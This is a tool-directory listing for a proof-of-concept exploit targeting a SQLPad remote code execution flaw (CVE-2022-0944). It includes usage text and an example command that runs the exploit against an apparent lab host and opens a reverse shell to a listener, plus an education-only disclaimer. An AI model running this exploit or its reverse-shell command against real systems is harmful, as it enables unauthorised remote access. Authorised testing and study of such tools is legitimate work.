Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-0944_RCE_POC — Proof-of-concept exploit for SQLPad RCE (CVE-2022-0944) that triggers a reverse shell to the attacker's machine, intended for authorized security testing and education. | Kitploit
Tools/GitHubGitHub/robocopsita/cve-2022-0944_rce_poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubrobocopsita/cve-2022-0944_rce_poc

CVE-2022-0944_RCE_POC

Proof-of-concept exploit for SQLPad RCE (CVE-2022-0944) that triggers a reverse shell to the attacker's machine, intended for authorized security testing and education.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
211 year agoNot yet reviewed
Share

CVE-2022-0944

Proof of concept exploit for SQLPad RCE (CVE-2022-0944) leading to a RCE with a revershell to the attackers PC.

Usage

root@kitploit:~
usage: script.py URL IP PORT

positional arguments:
  URL         URL to SQLPad
  IP       Listener host address for reverse shell
  PORT       Listener port for reverse shell

Example:

root@kitploit:~
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443

Disclaimer

This repository contains tools that are intended solely for educational purposes, specifically for use in cybersecurity learning environments. The author of this code assumes no responsibility for any consequences arising from the use, misuse, or modification of this code. The code is provided "as is" without any warranty, either express or implied, including but not limited to the implied warranties of merchantability or fitness for a particular purpose.

Download Tool